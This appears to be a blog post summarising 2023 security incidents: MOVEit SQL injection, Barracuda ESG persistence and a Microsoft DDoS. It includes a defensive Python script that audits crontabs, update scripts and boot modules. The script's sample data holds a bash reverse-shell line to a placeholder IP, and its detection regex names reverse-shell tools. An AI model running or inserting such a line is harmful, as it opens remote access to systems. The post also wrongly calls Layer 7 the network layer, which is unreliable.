“If you think you know-it-all about cybersecurity, this discipline was probably ill-explained to you.”
Stephane Nappo

In my old blog, I used to take some time and write about the latest breaches, exploits, and vulnerabilities seen out in the wild. It wasn’t because I wanted to be another voice out in the world talking about all the security issues being found. It was more so that I could stay up to date and be educated on the latest happenings in the cyber security world (do we still call it cyber security?). I’ve spent a lot of time on AI lately, but I want to get back to what I know best, and that is security. So here is some of the latest news in security today:
MOVEit
Progress Software’s MOVEit Transfer application has been found to have multiple security vulnerabilities. Personally, I have never heard of this application, but a lot of government and Fortune 500 companies use it to transfer files securely internally and externally. Unfortunately, in May it was found to have a SQL injection flaw that, when abused, can allow an attacker to upload files, download files, and take control of the affected system. The vulnerabilities disclosed in June were a zero-day, as no mitigation existed to stop the issue. Compounding the issue (CVE-2023-34362), two more vulnerabilities were discovered that could allow an attacker to steal data from the affected system. HorizonAi provided a simple POC here if you want to play around with it. It’s a great POC as it’s fully commented in Python on how the attack works. What makes this attack particularly bad is its widespread use, and that data gained from the attack is considered sensitive, this being a “secure” file transfer application. It’s a bad look for Progress Software since the product is marketed as “Secure File Transfer and Automation Software for the Enterprise”. With three SQL injection vulnerabilities found, it makes me wonder if any pen testing was done on their own software. The SQL injection vulnerabilities aren’t overly difficult to execute, and more of them continue to be found. Already, local governments in the United States are warning of data breaches from this attack. I wish all the best to the security team over there and I hope it doesn’t get worse.
Barracuda Email Security Appliance
This gem of a CVE I have personal experience with. While I have not used Barracuda Email Security Appliances (ESG), the parent company I worked for did. Last fall the company I worked for started seeing an absolute deluge of email traffic from Barracuda ESG appliances. To us it amounted to a DDoS attack against our website on top of a large increase in phishing to our employees. We thought the root cause was a bounce or reflection of our SendGrid marketing emails back to us and that the phishing increase was a separate issue. In the end, we blocked that traffic with the help of our bot mitigation company and went on with our lives. It turns out that the traffic we were seeing was compromised ESG appliances. Now, I am not going to do a major write-up of how this attack worked as Mandiant already has a phenomenal write-up here. What made this attack particularly bad was something we deal with a lot in information security: persistence.

Once the attacker saw that Barracuda was trying to solve the flaw, they kicked into overdrive. Their first attempt at persistence was setting up cron jobs that enabled a reverse shell and ran hourly. Later attempts modified the Perl update script built into the appliance to execute code. Finally, to top it all off, they deployed a kernel rootkit that would be run at boot time. The persistence is so bad that both Barracuda and Mandiant recommend that customers replace their entire hardware (oof)! The attacker is most likely from China, as Mandiant discovered that during exfiltration the attacker was mainly looking for specific emails from East Asian academics and government officials. It’s not every day that a system is so seriously infected that the entire system needs to be replaced. I wish the security team over at Barracuda all the best.
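As an added example (not code from this post, Barracuda or Mandiant), here is a small Python audit a defender could run over an appliance's crontab, update script and boot-time module list to flag the three persistence mechanisms just described; the crontab text, vendor script hash and module allowlist are constructed sample data, not real appliance files.

```python
"""Added example (not from the blog post or Mandiant): a small audit that looks
for the three persistence mechanisms described above on a Linux-style appliance:
(1) hourly cron jobs that spawn a reverse shell, (2) an update script whose
hash no longer matches the vendor-shipped one, (3) unexpected kernel modules
loaded at boot. All inputs are constructed sample data, not real appliance files."""
import hashlib
import re

# Reverse-shell indicators commonly seen in cron-based persistence.
REVERSE_SHELL_RE = re.compile(r"(/dev/tcp/|\bnc\b.*-e|\bbash -i\b|\bperl -e\b)")
HOURLY_RE = re.compile(r"^(\S+)\s+\*\s+\*\s+\*\s+\*\s+")  # minute field set, every hour

def suspicious_cron_lines(crontab_text):
    """Return crontab lines that run hourly and contain a reverse-shell pattern."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if HOURLY_RE.match(line) and REVERSE_SHELL_RE.search(line):
            hits.append(line)
    return hits

def update_script_modified(script_bytes, known_good_sha256):
    """True when the appliance update script no longer matches the vendor hash."""
    return hashlib.sha256(script_bytes).hexdigest() != known_good_sha256

def unexpected_boot_modules(loaded_modules, allowlist):
    """Kernel modules present at boot that the vendor allowlist does not contain."""
    return sorted(set(loaded_modules) - set(allowlist))

# Constructed sample inputs (hypothetical, for demonstration only).
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/updater --check
15 * * * * /bin/bash -i >& /dev/tcp/203.0.113.10/4444 0>&1
30 * * * * /usr/bin/find /tmp -mtime +7 -delete
"""
VENDOR_SCRIPT = b"#!/usr/bin/perl\n# vendor update script (constructed)\nprint 'ok';\n"
VENDOR_SHA256 = hashlib.sha256(VENDOR_SCRIPT).hexdigest()  # stands in for a vendor-published hash
TAMPERED_SCRIPT = VENDOR_SCRIPT + b"system('/tmp/.x');\n"

if __name__ == "__main__":
    print(suspicious_cron_lines(SAMPLE_CRONTAB))
    print(update_script_modified(TAMPERED_SCRIPT, VENDOR_SHA256))
    print(unexpected_boot_modules(["e1000", "ext4", "evil_mod"], ["e1000", "ext4"]))
```

A real deployment would compare against hashes and module lists published by the vendor rather than ones computed on the possibly compromised box itself.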
Microsoft Office DDoS Outage
While DDoSing a site isn’t hacking or a vulnerability, it is annoying. What makes this attack interesting is that it happened to such a large company, and more specifically to a product that has defenses in place to mitigate such an attack. This report hit late last night and can be read here. Basically, a group from Sudan (not verified) launched a Layer 7 (network layer) DDoS attack against Microsoft’s cloud services. Microsoft didn’t provide much data on how much traffic hit them, but they did say it involved different methods of overloading their cloud resources. They did say, however, that the attack used “rented cloud resources, botnets, proxies, and VPNs” to attack them. So, whoever this attacker is, they are coordinated in some way to deploy so many resources to hit a complex target like Azure. Microsoft was obviously able to mitigate the attack and make some changes to its firewalls in case of future attacks. I do hope Microsoft releases more information in the future. It was probably a rough day for the network engineers and security engineers over at Microsoft. I hope they get some rest!
Conclusion
There have been multiple vulnerabilities and disclosures this month, but I wanted to focus on just the big ones. I’ll continue writing these once or twice a month depending on the security landscape and my time. I know in previous posts I went more in-depth on how some of these attacks worked. In future posts I will dive deeper; I just need to get used to writing again. Until next time, and stay safe out there!